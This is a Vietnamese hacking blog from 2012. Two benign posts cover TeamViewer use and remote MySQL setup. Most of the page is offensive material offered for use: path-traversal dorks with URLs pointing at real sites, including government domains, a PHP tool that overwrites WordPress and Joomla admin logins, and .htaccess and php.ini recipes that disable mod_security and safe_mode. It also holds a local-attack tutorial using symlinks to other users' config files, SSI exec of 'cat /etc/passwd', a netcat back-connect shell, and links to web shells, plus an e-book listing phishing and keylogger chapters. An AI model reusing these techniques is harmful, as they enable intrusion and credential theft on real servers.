Social Icons

Thứ Bảy, 28 tháng 7, 2012

Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa


Trong bài viết này chúng tôi hướng dẫn bạn sử dụng TeamViewer cho hai mục đích là truy cập màn hình desktop và lấy file từ máy ở xa.
Trước tiên bạn cần phải mở chương trình TeamViewer ở cả hai máy.
Bạn tải chương trình này tại địa chỉ sau: TeamViewer V5 (2,78MB)
Sau khi tải xong bạn bạn chạy file TeamViewer_Setup.exe vừa download về.
Trong cửa sổ Setup đầu tiên có hai lựa chọn cài đặt (Install) hoặc Run. Nếu nhu cầu sử dụng không thường xuyên thì bạn chọn Run. Bạn cũng có thể chọn Setup để cài vào máy.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Ở đây ta chọn Run, chọn Next.
Trong cửa sổ tiếp theo bạn check vào mục “I accept …” rồi nhấn Next để tiếp tục.
Bước cuối cùng bạn sẽ thấy cửa sổ như trong hình gồm có 2 phần: Wait for session và Create session.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
ID của máy ở xa là: 110 371 768 và pass là 1825 để bảo đảm bảo mật thì thông số này mỗi lần mở TeamViewer là mỗi khác.
Để thực hiện thao tác điều khiển, bạn phải mở đồng thời chương trình tại 2 máy.
Máy bạn đang ngồi ta tạm gọi là máy điều khiển, máy kia ta gọi là máy ở xa (partner).
Để điều khiển được, máy ở xa phải cung cấp ID và pass word cho máy điều khiển.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Máy điều khiển điền ID của máy ở xa vào ô ID trong phần Creat session
Điều khiển Desktop (Remote Desktop)
Ở máy điều khiển bạn điền ID của máy ở xa vào ô ID của phần Create session rồi click Connect to partner. Sau khi nhấn Connect to partner bạn điền mật khẩu của máy ở xa vào ô Password hiện lên.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Bạn điền mật khẩu ở trên vào ô này sau khi click vào nút Connect ....
Sau khi kết nối thành công, bạn sẽ thấy màn hình máy ở xa như sau, bạn có thể thao tác hoàn toàn trên máy đó giống như đang ngồi trên máy mình và có quyền chỉnh xóa tài nguyên trên máy ở xa đó.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Bạn có thể File Transfer trên thanh menu để chuyển đổi file giữa hai máy.
Chức năng này thích hợp cho việc hỗ trợ trực tuyến.
Tuy nhiên, nếu muốn nhờ ai hỗ trợ cho bạn, nhưng không muốn họ can thiệp vào tài nguyên máy tính của mình, họ chỉ có thể "click mẫu" lên lựa chọn, và tại điểm click đó sẽ hiển thị con trỏ to, màu xanh chỉ có tác dụng chỉ dẫn, không có hiệu lực trên máy của bạn thì bạn chọn Presentation.
Truy cập dữ liệu (File Transfer)
Bạn khởi động TeamViewer điền ID vào như trên, thay vì chọn Remote Desktop như trên bạn chọn File Transfer rồi click Connect như trên.
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Hướng dẫn sử dụng teamviewer để truy cập máy tính từ xa, Công nghệ thông tin, TeamViewer, download TeamViewer, su dung TeamViewer, huong dan su dung TeamViewer, cach dung TeamViewer, cai dat TeamViewer, internet, mang internet, cong nghe, cong nghe thong tin,
Lúc này chỉ có cửa sổ transfer file hiện lên và bạn thực hiện thao tác transfer file qua lại giữa hai máy như trong Windows.
Để nhận file, bạn chọn file trong cửa sổ Remote Machine, chọn thư mục lưu trữ trong cửa sổ Local Machine rồi nhấn vào nút Receive. Các file, thư mục bạn chọn sẽ được chuyển từ máy ở xa qua máy mình đang ngồi một cách nhanh chóng, tốc độ truyền file cũng tương đối nhanh.
Kinh nghiệm:
- Để thực hiện việc này, TeamViewer trên máy ở xa phải được mở và bạn phải có ID, pass của máy đó.
- Để bảo mật, các bạn phải bảo đảm không tiết lộ ID và pass nên tắt TeamViewer sau khi thực hiện các thao tác.
- Không nên chuyển các file mang tính bảo mật, riêng tư.
readmore...

Thứ Ba, 24 tháng 7, 2012

Đọc Mọi File Không Cần Shell

 DORK :

download.php?file=
down.php?filename=
down.php?file_name=
download.php?src=
download.php?f=

down tưng file 1 về dọc config lấy thống tiin user+pass localhost vào phpMyAdmin chiếm admin up shell

1 Số VD

Mã:
http://www.vpv.vn/download.php?file=
http://www.mcc.edu.vn/download.php?file=../../home.php
http://nobleromancoins.com/down.php?file=
http://www.lelon.com/down.php?f=index.php&n=index.php  
http://www.homeopathyphysician.com/down.php?file=../index.php
http://www.meta-biomed.com/english/e-notice/down.php?Code=e_data&File=../index.php&FileName=index.php
http://www.vienthong360.com/component/download/down.php?filename=../index.php
http://www.jnszjy.net/down.php?file=../index.php&sort=zzgg&realfilename=index.php
http://dhanvantaricollege.org/down.php?file=../index.php 
http://sciencedvine.org/down.php?filename=../index.php
http://www.chinare.gov.cn/table/down.php?file=
http://www.ykjtj.gov.cn/admin/xxgk/down.php?file_name=../../index.php
http://www.elija.org/download.php?src=../mysql_connect.php
http://www.mnda.gov.ng/download.php?f=mndaCmsPanel/classes/DatabaseManager..php
readmore...

Buồn buồn team vào máy victim ngịch chơi

==============================================
sau khi lgoin ta được !




cái này mang tính chất tham khảo !
readmore...

Thứ Hai, 23 tháng 7, 2012

Joomla & Wordpress Login data Changer


HTML Code:
<html dir="ltr">

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>HaCker-1420 - Joomla & Wordpress Login data Changer</title>
<style>

</style>
</head>

<body text="#C0C0C0" bgcolor="#000000" link="#FFFFFF" vlink="#C0C0C0" alink="#FFFFFF">

<div align="center">
 <table border="1" width="98%" id="table1" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td>
   <p align="center"><b><font face=Webdings size=6>!</font><font face=Verdana size=5>HaCker-1420
   - Login Data Changer v1.0</font></b><font face=Webdings size=6><b>!</b></font></td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table3" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td>
   <p align="center"><b><font face=Webdings size=6>!</font>Powered By 
   HaCker-1420--Dz hacker</b><font face=Webdings size=6><b>!</b></font></td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table4" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF" height="200">
  <tr>
   <td align="left" width="50%" valign="top">

<div align="center">
 <table border="1" width="100%" id="table5" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td bgcolor="#800000">
   <p align="center"><font color="#FFFFFF"><b>Wordpress Login Changer</b></font></td>
  </tr>
 </table>
</div>
   <p>
         <?
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host     : <br> <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"****\"> <br>
database : <br> <INPUT size=\"15\" value=\"Database\" name=\"database\" type=\"****\"><br>
username : <br> <INPUT size=\"15\" value=\"Username\" name=\"username\" type=\"****\"><br>
password : <br> <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\"><br>
      <br>
New username : <br> <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
New password : <br> <INPUT name=\"pwd\" size=\"15\" value=\"admin\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd       = $_POST['pwd'];
$admin     = $_POST['admin'];


         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);

$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());

if($a4s){
echo "<b>root@secure:# ~ Success : U Can Log In Using The New Data - Greetings From HaCker-1420</b> ";
}

}

?>
   
   </td>
   <td align="left" width="50%" valign="top">

<div align="center">
 <table border="1" width="100%" id="table6" dir="ltr" bgcolor="#404040" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF">
  <tr>
   <td bgcolor="#800000">
   <p align="center"><font color="#FFFFFF"><b>Joomla Login Changer</b></font></td>
  </tr>
 </table>
</div>
   <p>
   
    <?
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host :<br> <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"><br>
database :<br> <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br>
username :<br> <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\"><br>
password :<br> <INPUT size=\"15\" value=\"password\" name=\"password\" type=\"password\"><br>
      <br>
New Username:<br> <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
New Password: Use MD5 Hash or leave that, the new pass will be 123456<br> <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd       = $_POST['pwd'];
$admin     = $_POST['admin'];


         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);

$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 1") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 1") or die(mysql_error());

if($SQL){
echo "<b>root@secure:# ~ Success : U Can Log In Using The New Data - Greetings From HaCker-1420</b> ";
}

}

?>
   
   </td>
  </tr>
 </table>
</div>

<div align="center">
 <table border="1" width="98%" id="table7" dir="ltr" bgcolor="#800000" bordercolorlight="#FFFFFF" bordercolordark="#C0C0C0" bordercolor="#FFFFFF" height="110">
  <tr>
   <td valign="top">
   <p align="center"><b><font color="#FFFFFF">Special Greets To : All 
   <a href="http://www.gaza-hacker.com/cc/"><font color="#000000">Gaza-hacker</font></a> members</font><br>
   <font face="Georgia" color="#FFFFFF">Th3 Viper - !-Bb0yH4cK3r_Dz-!- -- L3b-R1z-  <br> <font size="2">read our news at : 
   </font></font>
   <font face="Georgia" color="#FFFFFF" size="2">
   <font color="#000000">Ozil.Mohamed</font></a></font></b></td>
  </tr>
 </table>
</div>

</body>

</html>
readmore...

.htaccess (đa chức năng)

Sử dụng tùy trường hợp

cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack


SSI VIEW SYMLJNK
.htaccess

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /etc/passwd tyn.txt

tyn.shtml:

<!--#include virtual="tyn.txt" -->

direct symljnk view file.php dưới dạng file text

options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php



Safe mod off

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

or

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

php.ini:

safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off

or

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

VIEW file.php

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

hạ safe_mode
php.ini

safe_mode = Off
disable_functions = ""

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>

.htaccess

AddHandler application/x-httpd-php4 .php .php4 .php3

.htaccess

php_flag safe_mode off
php_flag disable_functions ""

.htaccess

php_admin_value disable_functions ""
php_admin_value safe_mode off

.htaccess

php_value safe_mode off
php_value disable_functions ""

.htaccess

SetEnv PHPRC /home/user/public_html/php.ini

.htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

.htaccess

<Files *.php>
ForceType application/x-httpd-php4
</Files>
readmore...

Thứ Tư, 18 tháng 7, 2012

Dùng code trên 1 host và Database trên 1 host khác

Mục đích: Chạy 3 site A, B, C ở 3 host khác nhau và dùng chung data của 1 host H nào đó.

Công việc rất đơn giản. Chúng ta chỉ cần cấu hình trên host H cho phép IP của 3 host A, B, C kia được phép kết nối đên MySQL Server của nó.- Đăng nhập vào Cpanel --> Remote MySQL
Remote MySQL

Chỉnh như dưới đây:
Remote MySQL
Sau đó khi khai báo Config Database tại 3 host A, B, C kia. Thông số hostname các bạn sẽ thay thế localhost bằng IP của host H.
Remote MySQL
readmore...

E-Book - Gmail Hacking


Libro de Raj Chandel un Ethical Hacker, Cyber Security Expert, and Penetration Tester, en la cual explica todo lo relacionado con Gmail, podemos encontrar "trucos, tips, seguridad y hacking".

El libro contiene lo siguiente:

1. Gmail Trips &Tricks................................................................................7
1.1 How to recall sent mails .............................................................................8
1.2. Insert images in Gmail background ...........................................................9
1.3. Open Multiple Account in same browser....................................................11
1.4. How to delete e-mail Account...................................................................12
1.5. Integrate Facebook, Twitter in G-mail...................................................... 13
1.6. Most contacted E-mail Addresses in Gmail ................................................. 16
1.7. Gmail Goggles.............................................................................................. .17
1.8. Insert images in Gmail mail.......................................................................... 18
1.9. How to delete spam messages automatically.............................................. 19
1.10. G-mail shortcuts .......................................................................................... 20
1.11. Backup your G- mail inbox online ................................................................ 21
1.12. How to send bulk mail...................................................................................22
1.13. How to convert a Gmail Account into a MP3 Player....................................26
2. G-mail Web Apps...........................................................................................27
2.1. How to send mail in Future ......................................................................28
2.2. How to find big mail ....................................................................................... 29
2.3. How to Send Self destructing E-mail ............................................................... 31
2.4. Search your E-mail without login Gmail ......................................................... 33
2.5. Convert your E-mail into task ......................................................................... 34
2.6. How to Track Mail ........................................................................................... 35
2.7. How to find valid E-mail Address ................................................................... 36
2.8. Online Email Tracer ........................................................................................ 37
2.9. Remove side bar ADS in Gmail ...................................................................... 38
2.10. True Switch ................................................................................................. 39
2.11. Message in your mobile .............................................................................. 40
2.12. Send mail in your mobile ............................................................................ 41
3. Gmail Security ............................................................................................... 43
3.1. How to find if your Gmail Account has been hacked or not ........................ 44
3.2. How to protect your Gmail Account ............................................................. 45
3.3. Gmail Account security with 2 step verification ............................................ 46
3.4. How to trace sender information .................................................................. 47
4. Gmail Hacking................................................................................................. 48
4.1. Gmail Password Decryptor ............................................................................ 49
4.2. How to view hidden Password behind........................................................ 50
4.3. Web Browser pass view .............................................................................. 51
4.4. How to hack Gmail Account (Phishing) ..................................................... 52
4.5. How to hack Gmail password using Gmail Hacker ................................... 53
4.6. Hack Gmail account password with key logger ....................................... 55
5. Gmail Tools ............................................................................................... 65
5.1. How to backup your Email into a pen drive (mail stores) ........................ 66
5.2. SYNC DOCS ............................................................................................... 69
5.3. Use Gmail as a hard Drive ........................................................................ 70
5.4. G- Watchman ............................................................................................ 71
5.5. List of G mail Tools ....................................................................................... 72

Descargar Libro: http://www.sendspace.com/file/jg6fjw
Autor: Raj Chandel
readmore...

Thứ Ba, 17 tháng 7, 2012

Các Phương Pháp Local Attack

* Nhắc lại trình tự các bước Local Attack

1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell


1- View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, từ đó tìm cách đọc file config.php của user đó.


- Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:

http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f

Pass download: soleil_vhb
Pass dải nén: ceh.vn

- Câu lênh get user & domain

Cat /etc/virtual/domainowners


2- Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html


- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php


- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).

- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:

Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php

( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……



3- Get thông tin file config

Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.

3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:

- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục

Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php

- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php
- Ln : Lệnh symbolic link:
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
- Cd: Chuyển đổi thư mục

Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
- Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )
- Mkdir: tạo thư mục:

Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
- Touch : Tạo file:

touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)

Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
…………

3.2- Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php


1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.

Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php

Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi

2- Sử dụng Symbolic link – Gọi tắt là symlink

Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.



3- Sử dụng symlink kết hợp với ssi:

Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:

<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.

4- Chạy lệnh bằng file .shtml

- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->

- Lệnh xem file logs như sau:

<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->

Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.


5- Get all config toàn server



- Đâu tiên download shell get all config ( w.php) về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )








- Click vào done và thư mục có tên là tmp sẽ được tạo ra.

- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink








- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”







- Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.







* Đặc điểm của con shell get all config này:

+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.


6- Symbolink Root:

- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz
- Up file .htacess cùng thư mục với file r00t:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell

Demo:
http://tnmthatinh.gov.vn/soleil/r00t/


Và đây là cấu trúc của trường http://cdhh.edu.vn/

http://tnmthatinh.gov.vn/soleil/r00t...h/public_html/


7- Backconnet:

Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.

Đồ nghề cần thiết:

- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40

- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw

Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.ex e -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.

- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw

( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )

- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng

- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]


Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443


+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.

- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat

- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.


8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau

create table soleil ( ducdung08clc varchar (1024));

- Query load các thông tin vào table table vừa được tạo:

load data local infile '/etc/passwd' into table soleil

Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.

- Query hiện thị các thông tin được load vào table soleil:

select * from soleil

- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.

1 số lưu ý:

- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:









+ Soleil.pin

http://www.mediafire.com/?4k94v1i0shmr46c
Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:

## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin

+ telnet.pl

http://www.mediafire.com/?t9cavs1n0ipthq1
shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.







